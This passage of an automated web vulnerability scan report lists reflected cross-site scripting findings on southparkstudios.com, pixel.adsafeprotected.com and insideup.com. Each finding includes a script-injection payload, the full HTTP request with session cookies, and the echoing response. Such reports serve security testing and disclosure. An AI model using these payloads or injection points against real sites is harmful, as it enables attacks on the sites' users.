3.183. http://www.southparkstudios.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.southparkstudios.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a395"><script>alert(1)</script>b55c0389c3b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico9a395"><script>alert(1)</script>b55c0389c3b HTTP/1.1
Host: www.southparkstudios.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-mobile-detected=no; mbox=check#true#1303242692|session#1303242631302-17636#1303244492; s_nr=1303242631335; s_cc=true; s_sq=%5B%5BB%5D%5D; __qca=P0-782518941-1303242631379; mtvn_guid=1303242589-949; s_ppv=100

Response

HTTP/1.0 404 Not Found
Server: Apache/2.0.63 (Unix) PHP/5.3.2
X-Powered-By: PHP/5.3.2
Content-Type: text/html;charset=utf-8
Content-Length: 9180
Expires: Tue, 19 Apr 2011 20:02:08 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Tue, 19 Apr 2011 20:02:08 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>

...[SNIP]...
<script src="http://repo.comedycentral.com/feeds/init/southparkstudios.com?url=/favicon.ico9a395"><script>alert(1)</script>b55c0389c3b&cmsPageId=" type="text/javascript">
...[SNIP]...

3.184. http://www.southparkstudios.com/feeds/poll-image/random [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.southparkstudios.com
Path:   /feeds/poll-image/random

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 48885"><script>alert(1)</script>6c94495e35f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /feeds48885"><script>alert(1)</script>6c94495e35f/poll-image/random HTTP/1.1
Host: www.southparkstudios.com
Proxy-Connection: keep-alive
Referer: http://www.southparkstudios.com/poll
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-mobile-detected=no; __qca=P0-782518941-1303242631379; mtvn_guid=1303242589-949; s_ppv=100; qcDemo=demo%253DD%253Bdemo%253DT%253Bdemo%253D1189; mbox=check#true#1303242727|session#1303242631302-17636#1303244527; s_nr=1303242666203; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.0 404 Not Found
Server: Apache/2.0.63 (Unix) PHP/5.3.2
X-Powered-By: PHP/5.3.2
Content-Type: text/html;charset=utf-8
Content-Length: 9196
Expires: Tue, 19 Apr 2011 20:05:15 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Tue, 19 Apr 2011 20:05:15 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>

...[SNIP]...
<script src="http://repo.comedycentral.com/feeds/init/southparkstudios.com?url=/feeds48885"><script>alert(1)</script>6c94495e35f/poll-image/random&cmsPageId=" type="text/javascript">
...[SNIP]...

3.185. http://www.southparkstudios.com/feeds/poll-image/random [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.southparkstudios.com
Path:   /feeds/poll-image/random

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 900ab"><script>alert(1)</script>cbc1985aaa2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /feeds/poll-image900ab"><script>alert(1)</script>cbc1985aaa2/random HTTP/1.1
Host: www.southparkstudios.com
Proxy-Connection: keep-alive
Referer: http://www.southparkstudios.com/poll
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-mobile-detected=no; __qca=P0-782518941-1303242631379; mtvn_guid=1303242589-949; s_ppv=100; qcDemo=demo%253DD%253Bdemo%253DT%253Bdemo%253D1189; mbox=check#true#1303242727|session#1303242631302-17636#1303244527; s_nr=1303242666203; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.0 404 Not Found
Server: Apache/2.0.63 (Unix) PHP/5.3.2
X-Powered-By: PHP/5.3.2
Content-Type: text/html;charset=utf-8
Content-Length: 9268
Expires: Tue, 19 Apr 2011 20:05:17 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Tue, 19 Apr 2011 20:05:17 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>

...[SNIP]...
<script src="http://repo.comedycentral.com/feeds/init/southparkstudios.com?url=/feeds/poll-image900ab"><script>alert(1)</script>cbc1985aaa2/random&cmsPageId=" type="text/javascript">
...[SNIP]...

3.186. http://www.southparkstudios.com/feeds/poll-image/random [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.southparkstudios.com
Path:   /feeds/poll-image/random

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b73f"><script>alert(1)</script>5e9dd41d598 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /feeds/poll-image/random4b73f"><script>alert(1)</script>5e9dd41d598 HTTP/1.1
Host: www.southparkstudios.com
Proxy-Connection: keep-alive
Referer: http://www.southparkstudios.com/poll
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-mobile-detected=no; __qca=P0-782518941-1303242631379; mtvn_guid=1303242589-949; s_ppv=100; qcDemo=demo%253DD%253Bdemo%253DT%253Bdemo%253D1189; mbox=check#true#1303242727|session#1303242631302-17636#1303244527; s_nr=1303242666203; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.0 404 Not Found
Server: Apache/2.0.63 (Unix) PHP/5.3.2
X-Powered-By: PHP/5.3.2
Content-Type: text/html;charset=utf-8
Content-Length: 9210
Expires: Tue, 19 Apr 2011 20:05:18 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Tue, 19 Apr 2011 20:05:18 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>

...[SNIP]...
<script src="http://repo.comedycentral.com/feeds/init/southparkstudios.com?url=/feeds/poll-image/random4b73f"><script>alert(1)</script>5e9dd41d598&cmsPageId=" type="text/javascript">
...[SNIP]...

3.187. http://www.southparkstudios.com/forum/ucp.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.southparkstudios.com
Path:   /forum/ucp.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 92585"><script>alert(1)</script>16db96cd4bb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /forum92585"><script>alert(1)</script>16db96cd4bb/ucp.php?mode=register HTTP/1.1
Host: www.southparkstudios.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-mobile-detected=no; __qca=P0-782518941-1303242631379; mtvn_guid=1303242589-949; s_ppv=100; qcDemo=demo%253DD%253Bdemo%253DT%253Bdemo%253D1189; mbox=check#true#1303242727|session#1303242631302-17636#1303244527; s_nr=1303242666203; s_cc=true; s_sq=viacomedycentral%2Cviasouthparkstudios%3D%2526pid%253Dshows%25252Fsouthparkstudios%25252Fguide%25252Fepisodes%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.southparkstudios.com%25252Faccount%25252Flogin%2526ot%253DA; southpark_u=1; southpark_username=Anonymous; southpark_sid=608cb90aa087ada1f5f6450eab76d9b5; southpark_k=

Response

HTTP/1.0 404 Not Found
Server: Apache/2.0.63 (Unix) PHP/5.3.2
X-Powered-By: PHP/5.3.2
Content-Type: text/html;charset=utf-8
Content-Length: 9210
Expires: Tue, 19 Apr 2011 20:05:26 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Tue, 19 Apr 2011 20:05:26 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>

...[SNIP]...
<script src="http://repo.comedycentral.com/feeds/init/southparkstudios.com?url=/forum92585"><script>alert(1)</script>16db96cd4bb/ucp.php?mode=register&cmsPageId=" type="text/javascript">
...[SNIP]...

3.188. http://www.southparkstudios.com/gsp/shared/homepage/banners/quotes/0309-quote-moses-macaroni-pictures.swf [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.southparkstudios.com
Path:   /gsp/shared/homepage/banners/quotes/0309-quote-moses-macaroni-pictures.swf

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c4dd0"><script>alert(1)</script>820d596d17d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gspc4dd0"><script>alert(1)</script>820d596d17d/shared/homepage/banners/quotes/0309-quote-moses-macaroni-pictures.swf HTTP/1.1
Host: www.southparkstudios.com
Proxy-Connection: keep-alive
Referer: http://www.southparkstudios.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-mobile-detected=no; __qca=P0-782518941-1303242631379; mtvn_guid=1303242589-949; s_ppv=100; qcDemo=demo%253DD%253Bdemo%253DT%253Bdemo%253D1189; mbox=check#true#1303242724|session#1303242631302-17636#1303244524; s_nr=1303242663276; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.0 404 Not Found
Server: Apache/2.0.63 (Unix) PHP/5.3.2
X-Powered-By: PHP/5.3.2
Content-Type: text/html;charset=utf-8
Content-Length: 9248
Expires: Tue, 19 Apr 2011 20:04:56 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Tue, 19 Apr 2011 20:04:56 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>

...[SNIP]...
<script src="http://repo.comedycentral.com/feeds/init/southparkstudios.com?url=/gspc4dd0"><script>alert(1)</script>820d596d17d/shared/homepage/banners/quotes/0309-quote-moses-macaroni-pictures.swf&cmsPageId=" type="text/javascript">
...[SNIP]...

3.189. http://www.southparkstudios.com/guide/episodes/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.southparkstudios.com
Path:   /guide/episodes/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dded6"><script>alert(1)</script>df8005b0ae8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /guidedded6"><script>alert(1)</script>df8005b0ae8/episodes/ HTTP/1.1
Host: www.southparkstudios.com
Proxy-Connection: keep-alive
Referer: http://www.southparkstudios.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-mobile-detected=no; __qca=P0-782518941-1303242631379; mtvn_guid=1303242589-949; s_ppv=100; qcDemo=demo%253DD%253Bdemo%253DT%253Bdemo%253D1189; mbox=check#true#1303242724|session#1303242631302-17636#1303244524; s_nr=1303242663276; s_cc=true; s_sq=viacomedycentral%2Cviasouthparkstudios%3D%2526pid%253Dshows%25252Fsouthparkstudios%25252Fhome%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.southparkstudios.com%25252Fguide%25252Fepisodes%25252F%2526ot%253DA

Response

HTTP/1.0 404 Not Found
Server: Apache/2.0.63 (Unix) PHP/5.3.2
X-Powered-By: PHP/5.3.2
Content-Type: text/html;charset=utf-8
Content-Length: 9250
Expires: Tue, 19 Apr 2011 20:04:58 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Tue, 19 Apr 2011 20:04:58 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>

...[SNIP]...
<script src="http://repo.comedycentral.com/feeds/init/southparkstudios.com?url=/guidedded6"><script>alert(1)</script>df8005b0ae8/episodes/&cmsPageId=" type="text/javascript">
...[SNIP]...

3.190. http://www.southparkstudios.com/guide/episodes/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.southparkstudios.com
Path:   /guide/episodes/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7d752"><script>alert(1)</script>909260ee294 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /guide/episodes7d752"><script>alert(1)</script>909260ee294/ HTTP/1.1
Host: www.southparkstudios.com
Proxy-Connection: keep-alive
Referer: http://www.southparkstudios.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-mobile-detected=no; __qca=P0-782518941-1303242631379; mtvn_guid=1303242589-949; s_ppv=100; qcDemo=demo%253DD%253Bdemo%253DT%253Bdemo%253D1189; mbox=check#true#1303242724|session#1303242631302-17636#1303244524; s_nr=1303242663276; s_cc=true; s_sq=viacomedycentral%2Cviasouthparkstudios%3D%2526pid%253Dshows%25252Fsouthparkstudios%25252Fhome%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.southparkstudios.com%25252Fguide%25252Fepisodes%25252F%2526ot%253DA

Response

HTTP/1.0 404 Not Found
Server: Apache/2.0.63 (Unix) PHP/5.3.2
X-Powered-By: PHP/5.3.2
Content-Type: text/html;charset=utf-8
Content-Length: 9210
Expires: Tue, 19 Apr 2011 20:04:58 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Tue, 19 Apr 2011 20:04:58 GMT
Connection: close
Vary: User-Agent


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>

...[SNIP]...
<script src="http://repo.comedycentral.com/feeds/init/southparkstudios.com?url=/guide/episodes7d752"><script>alert(1)</script>909260ee294/&cmsPageId=" type="text/javascript">
...[SNIP]...

3.191. http://www.southparkstudios.com/guide/episodes/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.southparkstudios.com
Path:   /guide/episodes/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c825"><script>alert(1)</script>744c18b4672 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /guide/episodes/?8c825"><script>alert(1)</script>744c18b4672=1 HTTP/1.1
Host: www.southparkstudios.com
Proxy-Connection: keep-alive
Referer: http://www.southparkstudios.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-mobile-detected=no; __qca=P0-782518941-1303242631379; mtvn_guid=1303242589-949; s_ppv=100; qcDemo=demo%253DD%253Bdemo%253DT%253Bdemo%253D1189; mbox=check#true#1303242724|session#1303242631302-17636#1303244524; s_nr=1303242663276; s_cc=true; s_sq=viacomedycentral%2Cviasouthparkstudios%3D%2526pid%253Dshows%25252Fsouthparkstudios%25252Fhome%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.southparkstudios.com%25252Fguide%25252Fepisodes%25252F%2526ot%253DA

Response

HTTP/1.0 200 OK
Server: Apache/2.0.63 (Unix) PHP/5.3.2
Content-Length: 31959
Content-Type: text/html;charset=utf-8
X-Powered-By: PHP/5.3.2
Vary: User-Agent
Expires: Tue, 19 Apr 2011 20:04:57 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Tue, 19 Apr 2011 20:04:57 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>

...[SNIP]...
<script src="http://repo.comedycentral.com/feeds/init/southparkstudios.com?url=/guide/episodes/?8c825"><script>alert(1)</script>744c18b4672=1&cmsPageId=343753" type="text/javascript">
...[SNIP]...

3.192. http://www.southparkstudios.com/poll [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.southparkstudios.com
Path:   /poll

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17f7a"><script>alert(1)</script>3286600b94e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /poll17f7a"><script>alert(1)</script>3286600b94e HTTP/1.1
Host: www.southparkstudios.com
Proxy-Connection: keep-alive
Referer: http://www.southparkstudios.com/guide/episodes/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-mobile-detected=no; __qca=P0-782518941-1303242631379; mtvn_guid=1303242589-949; s_ppv=100; qcDemo=demo%253DD%253Bdemo%253DT%253Bdemo%253D1189; mbox=check#true#1303242724|session#1303242631302-17636#1303244524; s_nr=1303242663276; s_cc=true; s_sq=viacomedycentral%2Cviasouthparkstudios%3D%2526pid%253Dshows%25252Fsouthparkstudios%25252Fhome%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.southparkstudios.com%25252Fguide%25252Fepisodes%25252F%2526ot%253DA

Response

HTTP/1.0 404 Not Found
Server: Apache/2.0.63 (Unix) PHP/5.3.2
X-Powered-By: PHP/5.3.2
Content-Type: text/html;charset=utf-8
Content-Length: 9255
Expires: Tue, 19 Apr 2011 20:04:59 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Tue, 19 Apr 2011 20:04:59 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>

...[SNIP]...
<script src="http://repo.comedycentral.com/feeds/init/southparkstudios.com?url=/poll17f7a"><script>alert(1)</script>3286600b94e&cmsPageId=" type="text/javascript">
...[SNIP]...

3.193. http://pixel.adsafeprotected.com/jspix [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://pixel.adsafeprotected.com
Path:   /jspix

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 519b1"-alert(1)-"9a5bdb36e23 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /jspix?anId=134&advId=2356384&campId=5396397&chanId=239414132&placementId=62214207&pubId=1036126 HTTP/1.1
Host: pixel.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=519b1"-alert(1)-"9a5bdb36e23
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Tue, 19 Apr 2011 20:03:10 GMT
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=EB5FA52EB4321C340AE3FB80FA0E3631; Path=/
Connection: keep-alive
Content-Length: 8363


var adsafeVisParams = {
   mode : "jspix",
   jsref : "http://www.google.com/search?hl=en&q=519b1"-alert(1)-"9a5bdb36e23",
   adsafeSrc : "",
   adsafeSep : "",
   requrl : "http://pixel.adsafeprotected.com/",
   reqquery : "anId=134&advId=2356384&campId=5396397&chanId=239414132&placementId=62214207&pubId=1036126",
   debug : "fa
...[SNIP]...

3.194. http://www.insideup.com/login.html [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /login.html

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d42d"><script>alert(1)</script>0af933f87e2f07608 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /login.html?username=&password=&_rememberme= HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
X-Requested-With: XMLHttpRequest
Accept: */*
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=6BEF346987D68A3E238C3C14837EFF90
Accept-Encoding: gzip, deflate
Referer: http://www.google.com/search?hl=en&q=4d42d"><script>alert(1)</script>0af933f87e2f07608

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:45:23 GMT
Server: Apache/2.2.9 (Fedora)
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Language: en-US
Content-Length: 2431
Connection: close
Content-Type: text/html;charset=ISO-8859-1


<script language="javascript">
function clearInput(e){
if(e.value=='username'||e.value=='password')
{e.value="";
}
}

</script>


                        <form id="loginForm" method="post">

...[SNIP]...
<input type="hidden" name="refererUrl" value="http://www.google.com/search?hl=en&q=4d42d"><script>alert(1)</script>0af933f87e2f07608">
...[SNIP]...

3.195. http://www.insideup.com/login.html [Referer HTTP header]  previous

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /login.html

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bcec4"><script>alert(1)</script>765084d5be8 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

POST /login.html HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
X-Requested-With: XMLHttpRequest
Accept: */*
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Content-Length: 60
Referer: http://www.google.com/search?hl=en&q=bcec4"><script>alert(1)</script>765084d5be8

refererUrl=&username=username&password=password&_rememberme=

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:16:21 GMT
Server: Apache/2.2.9 (Fedora)
Set-Cookie: JSESSIONID=3489F37ECD9EEB84E322393424DCFCB0; Path=/
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Language: en-US
Content-Length: 2669
Connection: close
Content-Type: text/html;charset=ISO-8859-1


<script language="javascript">
function clearInput(e){
if(e.value=='username'||e.value=='password')
{e.value="";
}
}

</script>


                        <form id="loginForm" method="post">

...[SNIP]...
<input type="hidden" name="refererUrl" value="http://www.google.com/search?hl=en&q=bcec4"><script>alert(1)</script>765084d5be8">
...[SNIP]...

Report generated by XSS.CX at Wed Apr 20 09:46:25 CDT 2011.